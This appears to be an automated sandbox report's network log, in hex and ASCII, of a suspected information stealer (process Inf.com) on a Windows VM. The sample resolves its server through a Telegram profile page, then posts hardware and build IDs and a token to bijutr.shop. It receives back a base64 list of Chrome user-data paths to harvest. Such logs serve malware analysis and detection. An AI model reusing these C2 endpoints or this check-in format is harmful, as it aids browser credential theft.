                                                                                                                                                                                                                                                                            2024-12-27 06:09:58 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 79 7a 48 51 64 68 6e 63 39 45 43 41 71 6b 47 6b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 65 39 39 34 34 66 37 62 65 38 63 62 34 65 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 59 50 45 35 38 7a 47 59 6f 4a 52 6f 61 35 57 55 43 75 55 6c 45 51 7a 53 6f 5a 51 4a 59 62 57 6a 7a 46 6d 4a 62 57 32 34 48 4a 6f 77 79 76 61 51 54 61 34 6c 67 34 75 6f 49 79 78 5a 6a 49 49 63 4d 74 6c 44 2f 64 61 4d 55 68 36 70 44 53 6c 72 6a 70 47 6f 41 34 4e 73 34 6f 4e 58 70 68 74 37 76 72 76 5a 74 45 36 6c 38 77 4e 6e
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: yzHQdhnc9ECAqkGk.2Context: be9944f7be8cb4eb<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
                                                                                                                                                                                                                                                                            2024-12-27 06:09:58 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 79 7a 48 51 64 68 6e 63 39 45 43 41 71 6b 47 6b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 65 39 39 34 34 66 37 62 65 38 63 62 34 65 62 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\QOS 56MS-CV: yzHQdhnc9ECAqkGk.3Context: be9944f7be8cb4eb
                                                                                                                                                                                                                                                                            2024-12-27 06:09:59 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                            2024-12-27 06:09:59 UTC58INData Raw: 4d 53 2d 43 56 3a 20 61 7a 39 2b 51 67 77 57 4d 30 4f 42 4e 69 56 64 4f 4d 31 6b 5a 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: az9+QgwWM0OBNiVdOM1kZQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            20192.168.2.64989220.198.119.84443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:24 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6e 52 76 55 6c 55 4f 38 4e 55 6d 73 47 4e 6a 47 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 66 61 35 64 65 39 66 34 33 65 62 31 39 32 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: nRvUlUO8NUmsGNjG.1Context: 4fa5de9f43eb1921
                                                                                                                                                                                                                                                                            2024-12-27 06:10:24 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                            2024-12-27 06:10:24 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6e 52 76 55 6c 55 4f 38 4e 55 6d 73 47 4e 6a 47 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 66 61 35 64 65 39 66 34 33 65 62 31 39 32 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 59 50 45 35 38 7a 47 59 6f 4a 52 6f 61 35 57 55 43 75 55 6c 45 51 7a 53 6f 5a 51 4a 59 62 57 6a 7a 46 6d 4a 62 57 32 34 48 4a 6f 77 79 76 61 51 54 61 34 6c 67 34 75 6f 49 79 78 5a 6a 49 49 63 4d 74 6c 44 2f 64 61 4d 55 68 36 70 44 53 6c 72 6a 70 47 6f 41 34 4e 73 34 6f 4e 58 70 68 74 37 76 72 76 5a 74 45 36 6c 38 77 4e 6e
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: nRvUlUO8NUmsGNjG.2Context: 4fa5de9f43eb1921<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
                                                                                                                                                                                                                                                                            2024-12-27 06:10:24 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 6e 52 76 55 6c 55 4f 38 4e 55 6d 73 47 4e 6a 47 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 66 61 35 64 65 39 66 34 33 65 62 31 39 32 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\QOS 56MS-CV: nRvUlUO8NUmsGNjG.3Context: 4fa5de9f43eb1921
                                                                                                                                                                                                                                                                            2024-12-27 06:10:24 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                            2024-12-27 06:10:24 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4e 51 74 79 6f 6b 51 76 56 30 36 64 30 58 61 42 59 70 58 53 62 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: NQtyokQvV06d0XaBYpXSbQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            21192.168.2.64990220.198.119.84443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:28 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 61 50 79 43 42 2f 6d 74 32 45 6d 4b 42 2b 30 76 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 34 61 65 32 62 32 31 37 30 30 65 62 63 37 34 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: aPyCB/mt2EmKB+0v.1Context: c4ae2b21700ebc74
                                                                                                                                                                                                                                                                            2024-12-27 06:10:28 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                            2024-12-27 06:10:28 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 61 50 79 43 42 2f 6d 74 32 45 6d 4b 42 2b 30 76 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 34 61 65 32 62 32 31 37 30 30 65 62 63 37 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 59 50 45 35 38 7a 47 59 6f 4a 52 6f 61 35 57 55 43 75 55 6c 45 51 7a 53 6f 5a 51 4a 59 62 57 6a 7a 46 6d 4a 62 57 32 34 48 4a 6f 77 79 76 61 51 54 61 34 6c 67 34 75 6f 49 79 78 5a 6a 49 49 63 4d 74 6c 44 2f 64 61 4d 55 68 36 70 44 53 6c 72 6a 70 47 6f 41 34 4e 73 34 6f 4e 58 70 68 74 37 76 72 76 5a 74 45 36 6c 38 77 4e 6e
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: aPyCB/mt2EmKB+0v.2Context: c4ae2b21700ebc74<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
                                                                                                                                                                                                                                                                            2024-12-27 06:10:28 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 61 50 79 43 42 2f 6d 74 32 45 6d 4b 42 2b 30 76 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 34 61 65 32 62 32 31 37 30 30 65 62 63 37 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: aPyCB/mt2EmKB+0v.3Context: c4ae2b21700ebc74<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                            2024-12-27 06:10:29 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                            2024-12-27 06:10:29 UTC58INData Raw: 4d 53 2d 43 56 3a 20 32 34 70 63 49 44 44 54 4c 6b 43 4f 4a 38 4b 36 63 57 71 56 68 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: 24pcIDDTLkCOJ8K6cWqVhg.0Payload parsing failed.


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            22192.168.2.649915149.154.167.994436636C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:33 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                            Host: t.me
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:10:34 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:34 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                            Content-Length: 12299
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Set-Cookie: stel_ssid=7c686fb0d107d9f729_12998985994814805423; expires=Sat, 28 Dec 2024 06:10:34 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                            Cache-control: no-store
                                                                                                                                                                                                                                                                            X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                            2024-12-27 06:10:34 UTC12299INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            23192.168.2.649921188.245.216.2054436636C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:36 UTC231OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:10:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:37 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:10:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            24192.168.2.649927188.245.216.2054436636C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:38 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----UAI5XB1VS0ZUAIEK6PHD
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 256
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:10:38 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 55 41 49 35 58 42 31 56 53 30 5a 55 41 49 45 4b 36 50 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 38 42 36 42 32 42 38 36 38 38 31 35 33 35 34 31 38 33 32 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 55 41 49 35 58 42 31 56 53 30 5a 55 41 49 45 4b 36 50 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 55 41 49 35 58 42 31 56 53 30 5a 55 41 49 45 4b 36 50 48 44 2d 2d 0d
                                                                                                                                                                                                                                                                            Data Ascii: ------UAI5XB1VS0ZUAIEK6PHDContent-Disposition: form-data; name="hwid"F48B6B2B86881535418320-a33c7340-61ca------UAI5XB1VS0ZUAIEK6PHDContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------UAI5XB1VS0ZUAIEK6PHD--
                                                                                                                                                                                                                                                                            2024-12-27 06:10:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:39 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:10:39 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 3a1|1|1|1|1223be772d3363e8387dd68577edaa40|1|0|1|1|0|50000|00


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            25192.168.2.649933188.245.216.2054436636C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:41 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----LFU3OHDJMYMYMYMYMYUA
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:10:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 46 55 33 4f 48 44 4a 4d 59 4d 59 4d 59 4d 59 4d 59 55 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 4c 46 55 33 4f 48 44 4a 4d 59 4d 59 4d 59 4d 59 4d 59 55 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 4c 46 55 33 4f 48 44 4a 4d 59 4d 59 4d 59 4d 59 4d 59 55 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: ------LFU3OHDJMYMYMYMYMYUAContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------LFU3OHDJMYMYMYMYMYUAContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------LFU3OHDJMYMYMYMYMYUACont
                                                                                                                                                                                                                                                                            2024-12-27 06:10:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:41 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:10:42 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                            Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            26192.168.2.649939188.245.216.2054436636C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:43 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----R9Z5X4W47GVAIM7GLNG4
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:10:43 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 52 39 5a 35 58 34 57 34 37 47 56 41 49 4d 37 47 4c 4e 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 52 39 5a 35 58 34 57 34 37 47 56 41 49 4d 37 47 4c 4e 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 52 39 5a 35 58 34 57 34 37 47 56 41 49 4d 37 47 4c 4e 47 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: ------R9Z5X4W47GVAIM7GLNG4Content-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------R9Z5X4W47GVAIM7GLNG4Content-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------R9Z5X4W47GVAIM7GLNG4Cont
